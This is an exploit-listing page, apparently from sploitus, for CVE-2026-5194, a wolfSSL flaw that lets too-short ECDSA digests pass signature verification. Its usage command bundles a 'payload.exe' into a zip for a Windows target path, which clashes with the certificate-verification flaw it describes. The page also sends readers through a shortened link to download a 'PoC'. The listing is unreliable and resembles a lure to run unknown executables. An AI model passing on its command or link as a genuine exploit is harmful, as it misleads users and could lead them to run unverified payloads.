## https://sploitus.com/exploit?id=4CC39E56-1F7E-5D24-92A4-72FD00F0882A
# CVE-2026-5194 - Security Vulnerability
## Quick Usage
```bash
python3 exploit.py -t "C:\\Path\\To\\Target" -o demo.zip --data-file payload.exe
```
## Exploitation Notes
- **Severity:** CRITICAL
- **CVSS:** 9.1
- **Impact:** Confidentiality, Integrity
- **Published:** 2026-04-09
## Technical Summary
Missing hash/digest size and OID checks allow digests smaller than allowed when verifying ECDSA certificates, or smaller than is appropriate for the relevant key type, to be accepted by signature verification functions. This could lead to reduced security of ECDSA certificate-based authentication if the public CA key used is also known. This affects ECDSA/ECC verification when EdDSA or ML-DSA is also enabled.
## Affected Versions
**Wolfssl Wolfssl:**
- before 5.9.1
## References
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-5194
## Exploit
[Download PoC](https://tinyurl.com/29slpe3f)